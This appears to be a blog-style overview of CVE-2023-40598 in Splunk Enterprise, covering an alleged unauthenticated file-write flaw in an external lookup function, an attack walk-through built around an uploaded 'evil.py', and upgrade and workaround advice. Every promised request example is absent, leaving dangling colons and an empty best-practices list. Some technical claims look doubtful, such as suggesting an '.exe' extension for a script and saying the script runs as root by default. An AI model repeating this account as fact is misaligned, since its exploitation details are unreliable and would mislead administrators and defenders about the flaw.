This is an overview of the CVE-2023-40598 vulnerability, which affects Splunk Enterprise versions below 8.2.12, 9.0.6, and 9.1.1. We will explain the nature of the vulnerability, how it can be exploited, and how it can be fixed. We will also provide code examples, links to web pages with valuable information, and tips on how to prevent similar vulnerabilities in the future.
CVE-2023-40598 is a vulnerability that allows an unauthenticated, remote attacker to upload arbitrary files to a Splunk Enterprise system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data.
Splunk Enterprise is a software platform that collects, analyzes, and visualizes data from various sources. Splunk Enterprise provides a web-based management interface that allows users to configure and manage the system, as well as access various features and applications. One of these features is the external lookup, which allows users to enrich data with information from external sources, such as databases, scripts, or web services.
The external lookup feature uses a legacy internal function called
lookup_external.py, which is located in the
$SPLUNK_HOME/bin directory. This function is responsible for invoking external commands or scripts and passing data to them via standard input and output. However, this function does not require any authentication or authorization. It does not check the validity or integrity of the data it receives. Therefore, an attacker can craft a malicious request that calls this function and passes arbitrary data to it, such as a file name and content. The function will then write the data to the specified file name in the
$SPLUNK_HOME/bin directory, without any verification or sanitization.
A successful exploit of this vulnerability could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system and elevate privileges to root. This could compromise the confidentiality, integrity, and availability of the system and the data it processes.
An attacker would need to send a specially crafted HTTP request to the Splunk Enterprise web interface, targeting the external lookup API. The request would have the following format:
lookup_external.py parameter specifies the internal function to call, the
lookup parameter specifies the file name to write to, and the
data parameter specifies the file content to write. The file name and content can be any arbitrary values. The file name should also have a valid extension, such as
.exe, depending on the type of file and the operating system. The file content should be a valid script or executable that can run on the target system and perform the desired actions, such as creating a reverse shell, downloading additional malware, or deleting files.
For example, the following request would upload a Python script named
evil.py to the
$SPLUNK_HOME/bin directory, which would execute the command
whoami and write the output to a file named
output.txt in the same directory:
The attacker could then execute the uploaded script by accessing it via the web interface:
The attacker could then check the result of the script execution by reading the
The output would show the user name of the process that executed the script, which would be
root by default.
To fix this vulnerability, Splunk has released software updates that address the issue. The affected Splunk Enterprise versions are below 8.2.12, 9.0.6, and 9.1.1. The fixed Splunk Enterprise versions are 8.2.12, 9.0.6, and 9.1.1 or later. Users are advised to upgrade to the latest version as soon as possible.
The software updates can be installed by following the instructions in the Splunk documentation: How to upgrade Splunk Enterprise
Alternatively, users can apply a workaround and disable the external lookup feature by deleting or renaming the
lookup_external.py file in the
$SPLUNK_HOME/bin directory. However, this may affect the functionality of some Splunk applications that rely on external lookups.
To prevent similar vulnerabilities in the future, Splunk developers and administrators should follow the best practices for secure coding and configuration, such as:
CVE-2023-40598 is a critical vulnerability that affects Splunk Enterprise versions below 8.2.12, 9.0.6, and 9.1.1. It allows an unauthenticated, remote attacker to upload arbitrary files to a Splunk Enterprise system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. The vulnerability can be exploited by sending a specially crafted HTTP request to the Splunk Enterprise web interface, targeting the external lookup API. The vulnerability can be fixed by upgrading to the latest Splunk Enterprise version or by disabling the external lookup feature. The vulnerability can be prevented by following the best practices for secure coding and configuration. Users are advised to take immediate action to protect their Splunk Enterprise systems from this vulnerability.